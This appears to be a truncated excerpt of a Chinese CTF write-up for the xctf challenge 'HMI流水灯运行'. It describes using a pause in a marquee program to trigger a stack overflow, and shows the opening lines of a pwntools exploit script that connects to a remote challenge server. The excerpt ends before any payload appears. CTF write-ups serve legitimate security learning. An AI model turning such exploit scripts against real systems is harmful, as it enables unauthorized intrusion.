HMI流水灯运行(xctf)
简单的程序,开始运行后会有一个跑马灯滚动。
反编译看源代码发现,跑马灯滚动三轮后有个短暂停顿,可以利用停顿间隔进行栈溢出。
from pwn import *
import time
context.log_level='debug'
r = remote("220.249.52.133",51688)
#r = process("./format",shell = True) #executes the binary
r.recvuntil("\n\n")
e = ELF("./format
原创
2020-11-20 14:27:00 ·
617 阅读 ·
1 评论